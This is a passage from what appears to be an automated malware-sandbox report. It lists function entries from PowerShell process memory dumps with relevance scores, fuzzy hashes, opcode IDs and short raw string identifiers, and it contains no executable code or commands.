                                                        • Instruction Fuzzy Hash: A2023731F083688FC755CB69981466ABBF6AF85310F18C4BBD855CB352DA31CC8AC7A1
                                                        Function 06F32480 Relevance: 7.8, Strings: 6, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$_$$^q$$^q$$^q
                                                        • API String ID: 0-2619997885
                                                        • Opcode ID: a047f4b67e76a464a3a2a09cb3a0faa937ea97b37701659563f0efabd616e986
                                                        • Instruction ID: 149137f9b11a395d69ce7bc8829953a7cf4e021b987da0e5ebb72bee57aa746d
                                                        • Opcode Fuzzy Hash: a047f4b67e76a464a3a2a09cb3a0faa937ea97b37701659563f0efabd616e986
                                                        • Instruction Fuzzy Hash: 4B814C31F043259FD7959B6CD81162ABBE2AFC6310B1484ABD805CF396DF36CA45C7A2
                                                        Function 06F329E3 Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$$^q$$^q
                                                        • API String ID: 0-2291298209
                                                        • Opcode ID: 0e0af9add20f0b9e1590d3b0cb82d8376d3035ad6ec546861c8ab525947b98fc
                                                        • Instruction ID: 6a2949381aea541ddd1a8b63fdc7975b80ce975abd52a4a93e7b5707114c5dd4
                                                        • Opcode Fuzzy Hash: 0e0af9add20f0b9e1590d3b0cb82d8376d3035ad6ec546861c8ab525947b98fc
                                                        • Instruction Fuzzy Hash: 4991AD75E00215DFDB54CF54C484E9ABBF2AF89314F2484A9E805AF356CB32DD82CBA1
                                                        Function 06F3247B Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: 743fd7448b86cf2447da61f47233cc6efd8fb7bb0cd87a3a7597dd3a5de96634
                                                        • Instruction ID: a6882883e5796b00fd1461d8478951d7d3848ca087b67a44de5d0f39aa8b5eba
                                                        • Opcode Fuzzy Hash: 743fd7448b86cf2447da61f47233cc6efd8fb7bb0cd87a3a7597dd3a5de96634
                                                        • Instruction Fuzzy Hash: 77019B36E00225DFEBA4CE48D850A25B765FF80750B28C15BE9098B24ADB31DB41C750
                                                        Function 06F34400 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: _
                                                        • API String ID: 0-701932520
                                                        • Opcode ID: 22ee6df25065f03f503bbda7ac13e28f7cbb312dadca5d9b4764d07a7c881d60
                                                        • Instruction ID: a756cd1f6704882cfb8051b39ac0050176cc0e310a133ca87fe0498db59aaa5f
                                                        • Opcode Fuzzy Hash: 22ee6df25065f03f503bbda7ac13e28f7cbb312dadca5d9b4764d07a7c881d60
                                                        • Instruction Fuzzy Hash: 22511732F003249FCB919F7C9901A6A7BE2AF81350B1484B6DD05CB366DB35CD85C7A2
                                                        Function 0076A490 Relevance: .5, Instructions: 548COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0dccdd830747df8defa9f511a2c85019a2836d495ca8349b4a90c1e48a089c23
                                                        • Instruction ID: 1795bac1153049a4756e8fed4f98c25c1e3a14722c90b1e0539a17a2b7d7d61c
                                                        • Opcode Fuzzy Hash: 0dccdd830747df8defa9f511a2c85019a2836d495ca8349b4a90c1e48a089c23
                                                        • Instruction Fuzzy Hash: 64229070A04249AFCB01CF58C594AAEBBB2FF49310F298195E845EB362D735ED85CF91
                                                        Function 007686E3 Relevance: .4, Instructions: 354COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd2268d5bed24420be0dc9beff9651f1a2ff468dd642eb35a80ddcf526e9e2dc
                                                        • Instruction ID: 5dc2a0bf180949405b02bb6f93e9ae5babebb61c469b2fe9664e07f83acf64ec
                                                        • Opcode Fuzzy Hash: bd2268d5bed24420be0dc9beff9651f1a2ff468dd642eb35a80ddcf526e9e2dc
                                                        • Instruction Fuzzy Hash: 2CE17130A00208DFDB54DBA4C545BADBBF2EF84314F148569D816AB395CB39EC86CF52
                                                        Function 0076AE68 Relevance: .3, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da277d00903ed34b2afffa0dc59161da97d3dde4d8615cb82f2aac5bba6b1820
                                                        • Instruction ID: 510e8c491a95ed918d23932917e757bb958e05cff0b2027f417f734d0c9f26dd
                                                        • Opcode Fuzzy Hash: da277d00903ed34b2afffa0dc59161da97d3dde4d8615cb82f2aac5bba6b1820
                                                        • Instruction Fuzzy Hash: ABE12974A00209EFCB15CFA8D584A9DFBB2FF49310F248169E805AB365C775ED85CB91
                                                        Function 00769098 Relevance: .3, Instructions: 324COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c123cafc897caea0a9cbed32143a00ed96319902a5c35a783529bb8a87a947d
                                                        • Instruction ID: 94ecea00c2434529bc93b4b3cc7d723800299872d470b337fb2adc797e7dc33b
                                                        • Opcode Fuzzy Hash: 8c123cafc897caea0a9cbed32143a00ed96319902a5c35a783529bb8a87a947d
                                                        • Instruction Fuzzy Hash: 50D11774A00219EFCB04CF98D584A9EFBB6FF89310F248159E905AB365C735ED86CB90
                                                        Function 00768880 Relevance: .2, Instructions: 233COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea083555a3826cda9efd1630f958a3ca348c5428ad9bf43cccde9f9c9b829388
                                                        • Instruction ID: 8560e2d257eb4bde93a6fd260567fc3a969efab6acf4dcdfc3af4d45fa00fc42
                                                        • Opcode Fuzzy Hash: ea083555a3826cda9efd1630f958a3ca348c5428ad9bf43cccde9f9c9b829388
                                                        • Instruction Fuzzy Hash: 6A91A070A00214CFDB54DFA4C544BAEBBF2AF84314F148629D81AAB391DF38EC85CB42
                                                        Function 007630B0 Relevance: .2, Instructions: 209COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbd878a8c137f96f2a8f342219f1355e513c25f7045a7e6dda22c7c0926bb4ac
                                                        • Instruction ID: 75308088d380568eefc7b418cd1b3d835f6320f60b9480599382a6bbf968f09c
                                                        • Opcode Fuzzy Hash: dbd878a8c137f96f2a8f342219f1355e513c25f7045a7e6dda22c7c0926bb4ac
                                                        • Instruction Fuzzy Hash: 7A917C70A006498FCB19CF59C8949AEFBB1FF48310B248699D816AB365D739FD51CFA0
                                                        Function 0076A7E1 Relevance: .1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 563dff40ad19470f24f6c4cc909a3e2f5d157755318d1f87c18a17e792deca2f
                                                        • Instruction ID: 49c30a8f58fe27579733826f435ba0950a324ec1c7e8522557135c12cfe6073a
                                                        • Opcode Fuzzy Hash: 563dff40ad19470f24f6c4cc909a3e2f5d157755318d1f87c18a17e792deca2f
                                                        • Instruction Fuzzy Hash: 5051FB74A00249EFCB05CFA8D584A9DBBF6BF48310F288559E805AB365C735ED85CF91
                                                        Function 0076B07F Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a7a61516eb9d07cfb2c54e0e5304ce8d5c9b83ee1dd69e325d147765e3bcb2f
                                                        • Instruction ID: 9d1c7d6bddd5133bf0afe6412a5b7ab7d22dde80cb940fefd91b26f78ae41117
                                                        • Opcode Fuzzy Hash: 6a7a61516eb9d07cfb2c54e0e5304ce8d5c9b83ee1dd69e325d147765e3bcb2f
                                                        • Instruction Fuzzy Hash: 3F51E674A00209EFDB05CFA8D594A9DFBB2FF49310F248559E805AB365C736ED82CB90
                                                        Function 06F343F7 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8ddcbcde687baaa2e07e10c001634c6f435d4befbf1a478352ff9c186b3886e
                                                        • Instruction ID: 564ac286c9954106f326c90bd46000158dea81fff22beb29b33e06fe4eca909f
                                                        • Opcode Fuzzy Hash: a8ddcbcde687baaa2e07e10c001634c6f435d4befbf1a478352ff9c186b3886e
                                                        • Instruction Fuzzy Hash: 6B410272E00221DFDBA0CF68C541A6A7BE2AF80351F1980A9DD059B266DB35DD81CBE1
                                                        Function 007631C0 Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed34f6c82d24549ce2ffae029f0b74603dea374957687ae7c081f79f2fe37d8e
                                                        • Instruction ID: 7ec81fd87ebdca54f5b1fe3ee0052fec73880fc1a3dd168b4fa2a5dcfb8f85a6
                                                        • Opcode Fuzzy Hash: ed34f6c82d24549ce2ffae029f0b74603dea374957687ae7c081f79f2fe37d8e
                                                        • Instruction Fuzzy Hash: E2416AB0A005059FCB0ACF99C5949AEFBB1FF48310B158199D816AB369D73AFD50CFA0
                                                        Function 0076A480 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e3b9285e72d2f4ed0daf0f1e0bdabdea75b07a4bbe8c4942958d8e213355bd5
                                                        • Instruction ID: 61d98f4cfad1eee90843a484739642a4cb2411395f5f012b47da119562a58902
                                                        • Opcode Fuzzy Hash: 3e3b9285e72d2f4ed0daf0f1e0bdabdea75b07a4bbe8c4942958d8e213355bd5
                                                        • Instruction Fuzzy Hash: 89416A70A006459FCB15CF9DC4849AAFBB2FF89310B288659D816EB3A6D335EC51CF90
                                                        Function 00769037 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cdb54197744da4e7bcf78018c9c0f65c8833439939c037dee1ebffb33de0a30d
                                                        • Instruction ID: 488e76edc667769a651e4e867517645e754327cbf515cb6c4ad52a81ed4d763d
                                                        • Opcode Fuzzy Hash: cdb54197744da4e7bcf78018c9c0f65c8833439939c037dee1ebffb33de0a30d
                                                        • Instruction Fuzzy Hash: C2210775A0011A9FCB04CF58C9849AAFBB5FF4C310B258559E909EB361D735EC91CFA0
                                                        Function 00767302 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae1bacb6aa8c92a2bbc8ed3432a0dcc0a09737550f0437787a173d760f9dd968
                                                        • Instruction ID: d64b3df7278d05a2066576f1a1bf74d92b10e4c3071714175f7bbb99e40ff7b9
                                                        • Opcode Fuzzy Hash: ae1bacb6aa8c92a2bbc8ed3432a0dcc0a09737550f0437787a173d760f9dd968
                                                        • Instruction Fuzzy Hash: 6D112D2255E3D05FCB079338A8354E17FB0AA173A432A42DBE8C5CF5A3D5195D49CBE2
                                                        Function 00768568 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e24cbd2607626095ea2e0bf884c6c759fc345769d0e2eb67906f0806148f1cb0
                                                        • Instruction ID: 51c4d493519b09f49e1f916c6e4c228a969003e3a178190f19fca6caf20819c8
                                                        • Opcode Fuzzy Hash: e24cbd2607626095ea2e0bf884c6c759fc345769d0e2eb67906f0806148f1cb0
                                                        • Instruction Fuzzy Hash: 1311A335B002149FC704EF68E841AAE7BB6EF89304F504569E805DB365DF35ED0987A2
                                                        Function 00768578 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3189b8e58277e0e84b9ec004437fd6a2df5ac61c2b503ebf76471305deb9e73
                                                        • Instruction ID: 33a3a23310a665d6d532ceda7a385019cfe5e861c02b61dc59c8887e2ae11c62
                                                        • Opcode Fuzzy Hash: b3189b8e58277e0e84b9ec004437fd6a2df5ac61c2b503ebf76471305deb9e73
                                                        • Instruction Fuzzy Hash: B211A1347002149FC704EB68E881A6EB7B6FBC9340F104529E9059B365DF35ED0987A2
                                                        Function 0076A914 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31a2f10f17d5e4ee0a58ce81256cd2e3e26fb777af58f3a7c17436535f4b34e0
                                                        • Instruction ID: 4c23003a8e02dbe0961d8e15d883d846498ffadae7f6ed6fbda41f507633db1b
                                                        • Opcode Fuzzy Hash: 31a2f10f17d5e4ee0a58ce81256cd2e3e26fb777af58f3a7c17436535f4b34e0
                                                        • Instruction Fuzzy Hash: AE21F974A04249EFCB45CFA8D884A9DBBF1AF48310F298158E805AB361C775ED82CF90
                                                        Function 0076B18C Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cff61fac47f54a020a89725799949cbfbbceb6b0d1a1dec9742556a2a8c7127
                                                        • Instruction ID: 2443af68433a4eed6654deda11e24fbc46f00e4221b444c948cf672f659ab475
                                                        • Opcode Fuzzy Hash: 8cff61fac47f54a020a89725799949cbfbbceb6b0d1a1dec9742556a2a8c7127
                                                        • Instruction Fuzzy Hash: 5611EC75904209EFCB05CF98D894A9DFBB2FF49314F288155E805AB365C775EC82CB80
                                                        Function 0067D01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181185220.000000000067D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_67d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af4aeebd7165c467e6f7bcc2157da4e3edaaf5c4cf72389d01712a46ba9438b7
                                                        • Instruction ID: 8ee8c5dbd23f4cecf8ba6ab96f6f57766775753f78dd7d9e855703749e03a679
                                                        • Opcode Fuzzy Hash: af4aeebd7165c467e6f7bcc2157da4e3edaaf5c4cf72389d01712a46ba9438b7
                                                        • Instruction Fuzzy Hash: A301DB714093409AE7104E25CD84BA7FFA9DF51324F1CC929ED4C4B246C679D882C6B1
                                                        Function 0067D01C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181185220.000000000067D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_67d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79bf9d3772ec1de23e8a862f2e79da544a70463ea7208489a915f0b6239278b9
                                                        • Instruction ID: 724737363b45a0e42655ebc21920c35716c73bdb3c890305ab996e268984eac2
                                                        • Opcode Fuzzy Hash: 79bf9d3772ec1de23e8a862f2e79da544a70463ea7208489a915f0b6239278b9
                                                        • Instruction Fuzzy Hash: 83F06272409344AEE7108E16CD84BA2FFA8EF51734F18C95AED4C5E286C2799845CAB1
                                                        Function 00767328 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2181820644.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_760000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f5edd8b9dd39f6ac50d72659d7c9b9316e36061096c3a83a5857b5f15930a7f
                                                        • Instruction ID: 8422f694f88bb5340b12a7e8db2a0e90978cab91d116f7d240c278545065ac65
                                                        • Opcode Fuzzy Hash: 9f5edd8b9dd39f6ac50d72659d7c9b9316e36061096c3a83a5857b5f15930a7f
                                                        • Instruction Fuzzy Hash: BCD09239320228AB87149A58F445896BBE9FB8E351710866AF84A837509B71AC05CA85

                                                        Non-executed Functions

                                                        Function 06F30708 Relevance: 11.7, Strings: 9, Instructions: 499COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$]$_$$^q$$^q$$^q
                                                        • API String ID: 0-3788244726
                                                        • Opcode ID: 6cf6ae24b1d1fc848cb7b99546370afed8abdcc277742125dea15f869ac91359
                                                        • Instruction ID: 0f90c18f62a77120a92a4f0dd46879884acb29a277a3fa265c7cd570750b22cc
                                                        • Opcode Fuzzy Hash: 6cf6ae24b1d1fc848cb7b99546370afed8abdcc277742125dea15f869ac91359
                                                        • Instruction Fuzzy Hash: 68F11432F043259FDB648A68D80176BBBE6AFC5210B1484BBD945CF356DF32D886C7A1
                                                        Function 06F32DD0 Relevance: 9.1, Strings: 7, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-1608119003
                                                        • Opcode ID: d0dbcaebb4d11320256ec1869c12b8137521ebdc2d90c58fdf90c72524f02e19
                                                        • Instruction ID: a7087e4bea1e422c473aa062ff05b7fe9b2d4f284acbe60269699d464448bcc1
                                                        • Opcode Fuzzy Hash: d0dbcaebb4d11320256ec1869c12b8137521ebdc2d90c58fdf90c72524f02e19
                                                        • Instruction Fuzzy Hash: 8DA13832F043A58FD7658B78980166ABBE1AFC5710B1484ABD845CB362DB32D986C7A1
                                                        Function 06F33A80 Relevance: 9.0, Strings: 7, Instructions: 269COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-1608119003
                                                        • Opcode ID: 8d4ac498fb55259800ee6ecacd845159317290468ca31614b63dfdc8f95f7859
                                                        • Instruction ID: 1084cbef8721660a7a34094fcd16640524d7487413b3fe360bf8119d37a25bb1
                                                        • Opcode Fuzzy Hash: 8d4ac498fb55259800ee6ecacd845159317290468ca31614b63dfdc8f95f7859
                                                        • Instruction Fuzzy Hash: FE913B33F043B48FDB65CB68941566ABBE2AFC1610F1484AAD845CF361DB35DC45C7A1
                                                        Function 06F31330 Relevance: 7.8, Strings: 6, Instructions: 291COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$_$$^q$$^q$$^q
                                                        • API String ID: 0-2619997885
                                                        • Opcode ID: c919cea090e142f82a674fa3550f31e316a8d5f4007c19bd3af58c1d59f042f4
                                                        • Instruction ID: e1ed7a8c596766b22ded4714929ba62db80c6fde473f69694bda1876c91e6984
                                                        • Opcode Fuzzy Hash: c919cea090e142f82a674fa3550f31e316a8d5f4007c19bd3af58c1d59f042f4
                                                        • Instruction Fuzzy Hash: EC912D31F043259FDB95CB6CD81166ABBE6AFC1210B18C4AAD906CF356DF36C845C7A1
                                                        Function 06F33758 Relevance: 7.8, Strings: 6, Instructions: 251COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$]$tP^q$tP^q$$^q
                                                        • API String ID: 0-3639875650
                                                        • Opcode ID: 042b9a5ddc0334a0e33b5b4c22b15feb13276c90dfb00e4e996e189eeef3eaf3
                                                        • Instruction ID: 4e986c7f8cabb322b2f2fa7f9ddf8937d7a70ff7d3b0f2481803f688dffb6802
                                                        • Opcode Fuzzy Hash: 042b9a5ddc0334a0e33b5b4c22b15feb13276c90dfb00e4e996e189eeef3eaf3
                                                        • Instruction Fuzzy Hash: 07814B33F093A5CFDB61CB68840576ABFF2AF82310F1484AAD545CF255DA35C885C7A2
                                                        Function 06F34CF0 Relevance: 6.5, Strings: 5, Instructions: 272COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$_
                                                        • API String ID: 0-798638599
                                                        • Opcode ID: 4d50a705e49634a20243723708f7d059f3a0dd36e63aa9d9c5070fcf450929e9
                                                        • Instruction ID: 8c548b56d73059bb000a7056ab424891d7188786d4ab4e99d367aa7236825d42
                                                        • Opcode Fuzzy Hash: 4d50a705e49634a20243723708f7d059f3a0dd36e63aa9d9c5070fcf450929e9
                                                        • Instruction Fuzzy Hash: 9E91E535F04369CFCB94DB78D50466ABBE6AF85210B18C4AAD815CF356DB32CC85C7A2
                                                        Function 06F33190 Relevance: 6.5, Strings: 5, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$]$tP^q$tP^q
                                                        • API String ID: 0-1646045720
                                                        • Opcode ID: d88d2a5e421f2e46fec5d34b76438fb4a3464edde2131774dacb93bb9ac38c34
                                                        • Instruction ID: 814283e5a82166e5f3a502e3cb9efa828b184049aba8d6d3bfa490abf512c48a
                                                        • Opcode Fuzzy Hash: d88d2a5e421f2e46fec5d34b76438fb4a3464edde2131774dacb93bb9ac38c34
                                                        • Instruction Fuzzy Hash: BD813C33F043A59FD761DB68990176ABFE1AF81310F14846AD915CF292DB32D885C7D2
                                                        Function 06F334B0 Relevance: 6.5, Strings: 5, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
